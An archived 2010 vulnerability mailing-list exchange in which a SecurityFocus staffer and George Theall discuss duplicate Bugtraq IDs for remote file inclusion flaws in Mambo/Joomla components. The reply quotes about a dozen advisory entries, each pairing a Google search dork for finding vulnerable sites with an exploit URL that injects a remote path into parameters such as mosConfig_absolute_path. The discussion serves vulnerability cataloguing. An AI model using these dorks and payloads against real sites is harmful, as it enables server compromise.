[VIM] Bugtraq Ids 19233 vs 44071

rkeith rkeith at securityfocus.com
Thu Oct 14 11:09:22 CDT 2010


Hey George,

We'll look into that one, but most likely it is a duplicate. Some of the others are definitely duplicates.
This is what we found in our initial search:

BID 19222.
[+] Dork : inurl:index.php?option=?com_mambatstaff?
---------------------------------------------------------------------------
[$] ExPLo!T : http://www.example.com/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=[IndonesianCoder]


BID 19574
---------------------------------------------------------------------------
[+] Dork : inurl:index.php?option=?com_mambelfish?
---------------------------------------------------------------------------
[$] ExPLo!T : http://www.example.com/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=[IndonesianCoder]


BID 19502
---------------------------------------------------------------------------
[+] Dork : inurl:index.php?option=?com_mmp?
---------------------------------------------------------------------------
[$] ExPLo!T : http://www.example.com/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=[IndonesianCoder]


BID 19124
---------------------------------------------------------------------------
[+] Dork : inurl:index.php?option=?com_moodle?
---------------------------------------------------------------------------
[$] ExPLo!T : http://www.example.com/components/com_moodle/moodle.php?mosConfig_absolute_path=[IndonesianCoder]


BID 19122
---------------------------------------------------------------------------
[+] Dork : inurl:index.php?option=?com_mospray?
---------------------------------------------------------------------------
[$] ExPLo!T : http://www.example.com/components/com_mospray/scripts/admin.php?basedir=[IndonesianCoder]


BID 19138
---------------------------------------------------------------------------
[+] Dork : inurl:index.php?option=?com_pcchess?
---------------------------------------------------------------------------
[$] ExPLo!T : http://www.example.com/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=[IndonesianCoder]


BID 19505
---------------------------------------------------------------------------
[+] Dork : inurl:index.php?option=?com_peoplebook?
---------------------------------------------------------------------------
[$] ExPLo!T : http://www.example.com/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=[IndonesianCoder]


BID 18968
---------------------------------------------------------------------------
[+] Dork : inurl:index.php?option=?com_performs?
---------------------------------------------------------------------------
[$] ExPLo!T : http://www.example.com/components/com_performs/performs.php?mosConfig_absolute_path=[IndonesianCoder]


BID 19100
---------------------------------------------------------------------------
[+] Dork : inurl:index.php?option=?com_multibanners?
---------------------------------------------------------------------------
[$] ExPLo!T : http://www.example.com/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[IndonesianCoder]


BID 23129

[+] Dork : inurl:index.php?option=?com_admin?
---------------------------------------------------------------------------
[$] ExPLo!T : http://www.example.com/components/com_simpleboard/file_upload.php?sbp=[IndonesianCoder]


BID 19492

[+] Dork : inurl:index.php?option=?com_webring?
---------------------------------------------------------------------------
[$] ExPLo!T : http://www.example.com/administrator/components/com_webring/admin.webring.docs.php?component_dir=[IndonesianCoder]


-Rob

George A. Theall wrote:
> Bugtraq Ids 19233 and 44071 seem to cover the same issue, apart from the
> fact that the discussions talk of Mambo versus Joomla!. Since the issue
> is in a third-party component that works in either CMS, shouldn't the
> issue be covered by just one BID?
> 
> Btw, I wouldn't be surprised if some of the other issues reported by
> jos_ali_joe as part of
> http://packetstormsecurity.org/1010-exploits/joomlamulti-rfi.txt are
> dups.  Is anyone looking into them? Rob?
> 
> 
> George



